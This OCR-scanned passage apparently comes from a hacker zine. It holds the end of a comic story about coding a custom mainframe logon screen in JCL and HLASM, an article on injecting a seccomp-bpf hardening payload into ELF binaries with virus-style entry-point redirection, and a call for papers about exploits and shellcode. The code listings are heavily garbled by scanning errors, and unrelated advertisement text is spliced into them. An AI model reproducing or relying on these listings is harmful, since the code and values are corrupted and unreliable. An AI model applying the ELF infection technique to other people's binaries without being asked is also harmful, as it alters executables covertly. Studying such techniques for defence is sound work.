don't want to." 


Big John got up and settled into the driver's seat, 
“Where ya headin?” he asked. I guess he was done 
teaching me what I needed to learn. “Fifth and Gib- 
son," I replied. Back to my office. I was eager to get 
started on my own screen now that I knew what I 
was doing. I buckled in next to Big John and got 
to the office, thankfully no sight of Rico or his EF 
Boys. 








Back at my desk I created two things. First, 
I made a quick and dirty python script so I could 
rapidly prototype TN3270 command ideas I had (in- 
cluded). Second I decided to code up a macro to 
handle all the MSG types: 


First we needed that sweet, sweet JCL header: 


//COOLSCRN JOB ’build tso screen , ’IBMUSER’ , 
NOTIFY—&SYSUID , 

// | MSGCLASS=H, MSGLEVEL= (1,1) 

//BUILD EXEC ASMACL 

//C.SYSLIB DD DSN-SYSI.SISTMACI, DISP-SHR 

DD DSN=SYS1.MACLIB, DISP=SHR 

DD x 





d 
J /C.SYSIN 


Next, I needed a way to handle all the messages. 
I whipped up a quick macro, with all the colors I 


might need. 


MACRO 
SCREEN &MSG=.,&TEXT=. 
AIF (&MSG^ EQ ’.’ OR '&TEXT' EQ 
„END 
LCLC &BFNAME &BFSTART,&BFEND 
SETC  'X''290142F1'"" 
&RED SEIC  'X"'290142F2'"" 
&PINK SEIC  'X"'290142F3" 
&GREEN | SETC ’X’’290142F4’ 
&TURQ SEIC  'X"'290142F5"' 
&YELLOW SETC ’X’’290142F6’ 
&WHITE . SETC ’X’’290142F7’ 
&BFNAME SETC  "BUF'.'&MSG 
&BFBEGIN SETC ’?&BFNAME’. ’B’ 
&BFEND SEIC ’?&BFNAME’. ’ E’ 
. BEGIN DS OF 
&BFNAME DC AL2(&BFEND-&BFBEGIN ) 
&BFBEGIN EQU * 
DC X'05FT7' 
DC X'110000" 
* Fancy art goes here 
DC X 13 
&BFEND EQU * 
. END MEND 





I needed to address each of the messages, so I 
did that here. STDTRANS I copied from Big Blue 


themselves. 


USSTAB . USSTAB TABLE-STDTRANS,FORMAT-DYNAMIC 
USSMSG MSG=00 ,BUFFER= (BUF00 ,SCAN) 
USSMSG MSG=01,BUFFER=(BUF01 ,SCAN) 
USSMSG MSG=02 ,BUFFER=(BUF02 ,SCAN) 
USSMSG MSG=03 ,BUFFER= (BUF03 , SCAN) 
USSMSG MSG=04,BUFFER=(BUF04 ,SCAN) 
USSMSG MSG=05 ,BUFFER=(BUF05 , SCAN) 
USSMSG MSG=06 ,BUFFER= (BUF06 , SCAN) 
MSG= 08 ,BUFFER= (BUF08 , SCAN) 
MSG= 10 ,BUFFER=(BUF10,SCAN) 
MSG—11,BUFFER-(BUF11,SCAN) 
MSG= 12,BUFFER=(BUF12,SCAN) 
MSG= 14 ,BUFFER=(BUF14,SCAN) 
STDTRANS X’000102030440060708090 AOBOCODOEOF ’ 
X'101112131415161718191A1B1C1D1E1F> 
X'202122232425262728292A2B2C2D2E2F" 
X'303132333435363738393A3B3C3D3E3F" 
X'404142434445464748494A4BACADAEAF? 
X'505152535455565758595A5B5C5D5E5F" 
X'604062636465666768696 AGB6C6D6EGF" 
X'TÜTiTOTUTATSTOTTTBTOTATBTOTDTETP! 
X'80C1C2C3CA4C5C6C7C8C98A8B8C8D8ESF " 
X'90D1D2D3D4D5D6D7D8D99A9B9C9D9EO9F ' 
X’ AOA1E2E3E4E5E6E7E8E9AAABACADAEAF" 
X” BOB1B2B3B4B5B6B7B8B9BABBBCBDBEBF" 
X’ COC1C2C3C4C5C6C7C8C9CACBCCCDCECF ’ 
X’ DOD1D2D3D4D5D6D7D8D9DADBDCDDDEDF" 
X’ EOE1E2E3E4E5E6E7ES8E9EAEBECEDEEEF" 
X'FOF1F2F3F4F5FGF7FBFOFAFBFCFDFEFF" 
USSEND 
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After that I call the macro for every msg type 
and end the HLASM. 


SCREEN MSG=00,TEXT=’Launchin your program, see’ 
SCREEN MSG=01,TEXT=’I doubt you meant to do that’ 
SCREEN MSG-—02,TEXT-—'No, seriously" 

SCREEN MSG=03,TEXT='Parameter is unrecognized!’ 
SCREEN MSG=04,TEXT=’Parameter with value is invalid 


> 


SCREEN MSG=05 ,TEXT=’The key you pressed is inactive 


> 


SCREEN MSG=06,TEXT=’There is not such session." 


SCREEN MSG=08,TEXT=’Command failed as storage 
shortage." 

SCREEN MSG=10,TEXT=* ; 

SCREEN MSG=11,TEXT= Your session has ended’ 
SCREEN MSG=12,TEXT=' Required parameter is missing’ 
SCREEN MSG=14,TEXT=’There is an undefined USS 


message” 








END 





Finally, I added the JCL footer. 
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/ /L.SYSLMOD DD DSN-USER. VI'AMLIB, DISP=SHR 
/ /L.SYSIN DD x 


NAME USSN(R) 
//* 





Happy with the code I’d just written I made my- 
self a screen I'd be happy to see each and every day: 





I shut down my computer, ordered an Uber, and 
headed out of the office. 

A car pulled up as I looked up from my phone. 
This wasn’t my Uber, this was a Tesla, a black Tesla. 
The back door opened. Rico sat in the back, his one 
eye covered with a patch, gave him the look of a 
pirate, as did the gun he had pointed at my face. 
“Get in,” he said, motioning with the large revolver. 
Having no other option, I shrugged and got in the 
back of this Tesla-and wondered how much a no- 
show was gonna cost me on Uber. The Tesla sped 
off, and slammed me in to the back of my seat. 

After a few moments of silence, “Just who the 
fuck do you think you are?” Rico asked. 

“Hey, Rico, all I wanted to do was make a nice lo- 
gon screen for my mainframe.” I quipped. This vis- 
ibly upset Rico. The driver quietly snickered in the 


front seat, then said "This guy thinks he's a sysprog 
now?" 


“Shut up Oren!” Rico turned to me, “It works 
like this: we control the information. We decide 
who knows what. Youre wastin’ everyone's time 
over some aesthetic changes. The very fact that you 
phrase it as 'logon screen' means you're not ready 
to know this information!" 


I stammered a response, “Look, I don’t get what 
the big deal is, if you don't want to help who cares?" 
and I showed him a screenshot of my mainframe. 


This was not a good idea. Rico's face turned 
bright red. “BULLSHIT! You've wasted plenty of 
people's time! Tommy, Dave, John. You should've 
gone back and read the manuals, like I had to. All 
14,000 pages. Instead, you want a short cut. A 
hand out. Well, sonny, nothing comes easy. There 
is no possible way your system didn't come with cus- 
tomization rules, documentation and changes. That 
just not how it’s done!” 


I realized at this point Rico had never heard 
about the fact that you can emulate your own main- 
frame at home.?? Oren, turned his head to look at 
me, “Yeah, there ain’t no way you get to run your 
own system and do what you want all willy-nilly.” 


I noticed the red light before Oren and Rico, and 
got ready to put a dumb plan in to action. Oren 
slammed on the brakes and sent Rico flying in to the 
seat in front of him. Why don’t bad guys ever wear 
their seatbelts? While Rico was slightly stunned, I 
lunged and wrestled the gun free from his hands. At 
the same time, I grabbed my own pea shooter and 
pointed one each at Oren and Rico. 








^Enough of this shit,” I yelled, “you’re too late 
anyway, I’ve already built and replaced my USS Ta- 
ble.” I made sure to use the correct terminology 
now. “I already shot and missed you once today 
Rico, I won’t miss a second time. Now let me out of 
this car!” 


“Ok, ok. Cool it.” said Oren as he slowed the 
car. Rico just sat and stewed. 


I stepped out of the car. “This isn't the last 
you’ve heard from us!” Rico yelled, and the black 
Tesla sped off in to the night. 


He was right, of course. It wouldn’t be the last 
time I clashed with the EF gang and lived to tell 
about it. 
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I couldn't believe that was six years ago. Bigen- 
dian knew to reach out to me because I had done 
some nice screens for him in the past. My skills at 
making EBCDIC art since then had improved vastly. 





Thanks to another meeting years later with Big 
John, I learned you can add lines and graphics to 
make shapes using the rarely documented SFE GE 
SHAPE (\x08) command. At this point, I had the 
three-headed beast as a rough idea in my head what 
I wanted the screen to look like. But, I needed a 
way to animate the Windows 10 update nag screen. 

Like a small dog running in to a screen door, it 
hit me. I could use the MSGs and an AIF to display 
the nag screen! 

You see, when you first connect, that's a MSG10 
screen. If you hit enter, to the user it appears as 
though the screen just refreshed. But what's really 
happening is VTAM loads a MSG02 screen. Because 
you entered an invalid command (nothing). I could 
use an AIF statement to only show the Windows 10 
nag screen if an invalid command was entered. 

Above, where I declared the colors, I could also 
declare some shapes: 





'"X"'08D5' 
'"A"'08D4' 
X 08C5 


X 0804 
'"X""08A2' 
X? "0885 29 





And, with the help of Tommy's table, the one 
that gave me the coordinates for screen positions, 
and Big John's graphics, I could overlay the nag 
box on the screen. But only if the MSG is type 02. 
See Figure 21. 
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With that final piece of the puzzle I gave Bigen- 
dian Smalls a short demo. 





Then I hit <enter>, and it all came together. 





“Wow, that’s really awesome." he replied over 
ICQ. It sure was. 





* INSIDE 


* ACCEPT 


* 


. SKIP 


AIF ('&MSG' NE °02’).SKIP 
* TOP BAR 


DC 


X'11CT76D' 
&COLOR&BG&TURQ 
&UPLEFT 
52&HBAR 
&UPRIGHT 


X'11C87D' 
&COLOR&BG&TURQ 
&VBAR 

52C’ ^" 
X'11C9F3"' 
&VBAR 
X'114A4D" 
&COLOR&BG&TURQ 
&VBAR 

520 ^" 
X'114BC3' 
&VBAR 
X'114B5D"' 
&COLOR&BG&TURQ 
&VBAR 

520?’ ^" 
X'114CD3' 
&VBAR 
X’114C6D’ 
&COLOR&BG&TURQ 
&VBAR 

520 ^" 
X'114DE3' 
&VBAR 
X’?114D7D’ 
&COLOR&BG&TURQ 
&VBAR 

52C’ ^" 
X'1103B3"' 
&VBAR 
X’114F4D’ 
&COLOR&BG&TURQ 
&VBAR 

52C’ ^" 
X'110403"* 
&VBAR 
X'11505D"' 
&COLOR&BG&TURQ 
&VBAR 

520° ^" 
X'110453" 
&VBAR 
X'11D16D"' 
&COLOR&BG&TURQ 
&VBAR 

520 ^" 
X'1104A3" 
&VBAR 
X'11D27D' 
&COLOR&BG&TURQ 
&VBAR 

520 ^" 
X'1104F3"' 
X'0885" 


X'11050D" 
&COLOR&BG&TURQ 
&DOWNLEFT 
52&HBAR 
&DOWNRIGHT 


X'114A50" 
&COLOR&BG&TURQ 


DC C’Windows 10" 


DC 


DC C’Don’’t miss out. 


LINE 
DC 


X'114CF1' 


X'1150E3"' 


DC C'x Upgrade now 


UNDERLINES 


DC 


X'1150E2"' 


Free 


X’290341 F442F5C0C8’ 


Cx? 
&COLOR&BG&TURQ 
X'115074A" 


X’290341 F442F5C0C8’ 


X'40" 
&COLOR&BG&TURQ 


SBA, 1050 

SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 11 
SBA, ROW 12 
SBA, ROW 12 
SBA, ROW 13 
SBA, ROW 13 
SBA, ROW 14 
SBA, ROW 14 
SBA, ROW 15 
SBA, ROW 15 
SBA, ROW 16 
SBA, ROW 11 


ROW 10 COL 13 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


COL 


SBA, ROW 13 COL 


upgrade offer 


ends 


13 


66 


13 


66 


13 


66 


13 


66 


13 


66 


13 


66 


13 


66 


13 


66 


13 


66 


13 


16 


16 
July 29.’ 


SBA, ROW 15 COL 18 


Accept 


free 


offer 


, 


SBA, ROW 15 COL 18 


SFE, UNPROTECTED/UNDL/TURQ 


SBA, ROW 15 COL 42 


SFE, UNPROTECTED/UNDL/TURQ 


Figure 21. Upgrade Offer 
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17:09 Protecting ELF Files by Infecting Them 


Writing viruses is a sure way to learn not only 
the intricacies of linkers and loaders, but also tech- 
niques to covertly add additional code to an existing 
executable. Using such clever techniques to wreck 
havoc is not very neighborly, so here s a way to have 
some fun, by injecting additional code to tighten the 
security of an ELF executable. 

Since there's no need for us to hide the payload, 
the injection technique used here is pretty rudimen- 
tary. We find some empty space in a text seg- 
ment, divert the entry point to that space, run a 
bit of code, then execute the program as usual. Our 
payload will not delete files, scan the network for 
vulnerabilities, self-replicate, or anything nefarious; 
rather, it will use seccomp-bpf to limit the system 
calls a process can invoke. 
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by Leandro 'acidx” Pereira 
Caveats 


By design, seccomp-bpf is unable to read memory; 
this means that string arguments, such as in the 
open() syscall, cannot be verified. It would other- 
wise be a race condition, as memory could be mod- 
ified after the filter had approved the system call 
dispatch, thwarting the mechanism. 


It's not always easy to determine which system 
calls a program will invoke. One could run it under 
strace(1), but that would require a rather high 
test coverage to be accurate. It's also likely that 
the standard library might change the set of system 
calls, even as the program's local code is unchanged. 
Grouping system calls by functionality sets might be 
a practical way to build the white list. 


Which system calls a process invokes might 
change depending on program state. For instance, 
during initialization, it is acceptable for a program 
to open and read files; it might not be so after the 
initialization is complete. 


Also, seccomp-bpf filters are limited in size. 
This makes it more difficult to provide fine-grained 
filters, although eBPF maps?! could be used to 
shrink this PoC so slightly better filters could be 
created. 


Scripting like a kid 


Filters for seccomp-bpf are installed using the 
prctl(2) system call. In order for the filter to be 
effective, two calls are necessary. The first call will 
forbid changes to the filter during execution, while 
the second will actually install it. 


The first call is simple enough, as it only has nu- 
meric arguments. The second call, which contains 
the BPF program itself, is slightly trickier. It's not 
possible to know, beforehand, where the BPF pro- 
gram will land in memory. This is not such a big 
issue, though; the common trick is to read the stack, 
knowing that the call instruction on x86 will store 
the return address on the stack. If the BPF program 
is right after the call instruction, it's easy to obtain 
its address from the stack. 


CHARACTRON® 
SHAPED 
BEAM TUBES 


? 


jmp filter 


apply filter: 


; rdx contains the addr of the BPF program 
pop rdx 


; 32bit JMP placeholder to the entry point 
db 0xe9 
dd 0x00000000 





filter: 


call apply filter N 


BN 


Pe. 


bpf: 
bpf stmt (bpf _ld+bpf w-bpf abs), 4 
remainder of the BPF payload 


ELECTRON 
GUN 


? 





SELECTION 
PLATES 


Information is displayed on 
The BPF virtual machine has its own instruc- tube screens ranging from 


tion set. Since the shell code is written in assembly, 5" to 21" in diameter. Many 
it's easier to just define some macros for each BPF of these tubes used in the 


bytecode instruction and use them. PAGE Nerem achieve’ 20; 
000 hours or more of reli- 





able performance. 
Heart of the CHARAC- 
TRON Tube is a stencil-like 


matrix, a tiny disc with al- 


bpf ld equ 0x00 
2|bpf w equ 0x00 
bpf abs equ 0x20 
4| bpf jmp equ 0x05 
bpf jeq equ 0x10 
6 bpf k equ 0x00 
bpf ret equ 0x06 


phanumeric and symbolic 
characters etched through 
it. The matrix is placed 
within tube neck, in front of 
seccomp ret allow equ Ox7fff0000 an electron gun. 
10|seccomp ret trap equ 0x00030000 

audit arch x86 64 equ 0xc000003e 


The electron stream is ex- 
truded through a selected 
character in the matrix, 

macro bpf stmt 2 ; BPF statement 
14| dw (%1) 
db (0) 
16 db (0) 
dd (%2) 
18) %endmacro 


forming the beam into the 
desired character shape. 
When the beam impinges on 
the phosphor-coated tube 





face, the character is repro- 
duced. In compact tubes the 
entire matrix is flooded with 
electrons, generating a com- 
plete array of characters. 
Only the desired character 
is allowed to pass through a 


20 %macro bpf jump 4 ; BPF jump 
dw (961) 

22| db (962) 
db (963) 

24| dd (%4) 


%endmacro masking aperture. By actu- 


26 ally forming the character 
or symbol from the electron 
beam, the tube provides the 
highest available definition 
of character generation and 


overall display quality. 


macro sc allow 1 ; Allow syscall 
28 bpf jump {bpf jmp+bpf jeq+bpf k}, 0, 1, %l 
bpf stmt {bpf ret-bpf k),seccomp ret allow 
30| %endmacro 
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By listing all the available system calls from A Makefile takes care of assembling the pay- 
syscall.h,?? it's trivial to write a BPF filter that load, formatting it in a way that it can be included 
will deny the execution of all system calls, except in the C source, building a simple guinea pig pro- 
for a chosen few. gram twice, then infecting one of the executables. 

. . 34 
bp ste (lać IEEE M GE abs d Complete source code is available. 
bpf jump {bpf_jmp+bpf_jeq+bpf_k}, 0, 1, 
audit arch x86 64 
bpf stmt fbpf_ld+bpf w+bpf abs), 0 





1 Zzinclude <stdio.h> 
#include <sys/socket .h> 


3 
sc allow 0 read (2) int main(int argc, char *argv||) { 
sc allow write (2) 5 if (arge < 2) { 
sc allow open (2) printf("no socket created n"); 
sc allow close (2) 7 else { 
a sa int fd=socket (AF INET, SOCK STREAM, 6); 
sc allow mmap (2 ) 9 printf("created socket, fd = %d\n", fd); 


sc allow mprotect (2) 


sc allow munmap (2) 
access (2) 
pretl(2) 
_k}, seccomp ret trap 


sc allow 
sc allow 
bpf stmt (bpf ret-bp 


sc allow ; brk(2) 
f 





Testing & Conclusion 


The output in Figure 22 is an excerpt of a system 
Infecting call trace, from the moment that the seccomp-bpf 
filter is installed, to the moment the process is killed 


One of the nice things about open source being ubiq- bedie kerwel with a-SIGSYS siens] 


uitous today is that it’s possible to find source code 
for the most unusual things. This is the case of 
ELF Kickers, a package that contains a bunch of lit- 
tle utilities to manipulate ELF files.?? 

I’ve modified the infect.c program from that 
collection ever so slightly, so that the placeholder 
jmp instruction is patched in the payload and the 
entry point is correctly calculated for this kind of 
payload. 


Happy hacking! 


32echo "#include <sys/syscall.h>" | cpp -dM | grep ’*#define __NR_’ 
33git clone https://github.com/BR903/ELFkickers || unzip pocorgtfo17.pdf ELFkickers-3.1.tar.gz 
34unzip pocorgtfo1/.pdf infect.zip 


prctl(PR SET NO NEW PRIVS, 1, 0, 0, 0) =0 
pretl (PR SET SECCOMP, SEOCOMP MODE FILTER, {len=30, filter=0x400824}) = 0 
socket (AF_INET, SOCK STREAM, IPPROTO TCP) = 41 


—— SIGSYS [si signo=SIGSYS, si code=SYS SECCOMP, si call addr-0x7f2d01aa19e7 , 
si syscall- | NR socket, si arch=AUDIT ARCH X86 64) —— 

++ killed by SIGSYS (core dumped) +++ 

7| [1] 27536 invalid system call (core dumped)  strace ./hello 





Figure 22. Excerpt of strace(1) output when running hello.c. 
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17:10 Laphroaig's Home for Unwanted Polyglots and Oday 


Dearest neighbor, 

Our scruffy little gang started this camns3nar 
journal a few years back because we didn't much like 
the academic ones, but also because we wanted to 
learn new tricks for reverse engineering. We wanted 
to publish the methods that make exploits and poly- 
glots possible, so that folks could learn from each 
other. Over the years, we've been blessed with the 
privilege of editing these tricks, of seeing them early, 
and of seeing them through to print. 





PATENTS 


YOU HAVE AN INVENTION 
which you wish to patent you can 
write fully and freely to Munn & Co. 
for advice in regard to the best way 
of obtaining protection. Please send 
sketches or a model of your inven- 
tion, and a description of the device, 
explaining its operation. 


F 


communications are strictly confiden- 
tial. Our vast practice, extending over a 
period of seventy years, enables us in many 
cases to advise in regard to patentability 
without any expense to the client. Our Hand- 
Book on Patents is sent free on request. This 
explains our methods, terms, etc., in regard 
to Patents, Trade Marks, Foreign Patents, 
etc. 


All patents secured through us are described without 
cost to the patentee in the Scientific American. 


MUNN 6 CO. 


SOLICITORS OF PATENTS 


699 WOOLWORTH BLDG., NEW YORK 
and 625 F STREET, WASHINGTON, D. C. 
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from the desk of Pastor Manul Laphroaig, 
Tract Association of PoC|| GTFO. 





Now it's your turn to share what you know, that 
nifty little truth that other folks might not yet know. 
It could be simple, or à bit advanced. Whatever 
your nifty tricks, if they are clever, we would like to 
publish them. 

Do this: write an email in 7-bit ASCII telling 
our editors how to reproduce ONE clever, techni- 
cal trick from your research. If you are uncertain of 
your English, we'll happily translate from French, 
Russian, Southern Appalachian, and German. 

Like an email, keep it short. Like an email, you 
should assume that we already know more than a 
bit about hacking, and that we'll be insulted or— 
WORSE!that we'll be bored if you include a long 
tutorial where a quick explanation would do. 

Teach me how to falsify a freshman physics ex- 
periment by abusing floating-point edge cases. Show 
me how to enumerate the behavior of all illegal in- 
structions in a particular implementation of 6502, 
or how to quickly blacklist any byte from amd64 
shellcode. Explain to me how shellcode in Wine or 
ReactOS might be simpler than in real Windows. 

Don't tell us that it's possible; rather, teach us 
how to do it ourselves with the absolute minimum 
of formality and bullshit. 

Like an email, we expect informal language and 
hand-sketched diagrams. Write it in a single sit- 
ting, and leave any editing for your poor preacher- 
man to do over a bottle of fine scotch. Send this 
to pastor@phrackeorg and hope that the neighborly 
Phrack folks—praise be to them!—aren't man-in-the- 
middling our submission process. 





Yours in PoC and Pwnage, 
Pastor Manul Laphroaig, T«G« S.B. 


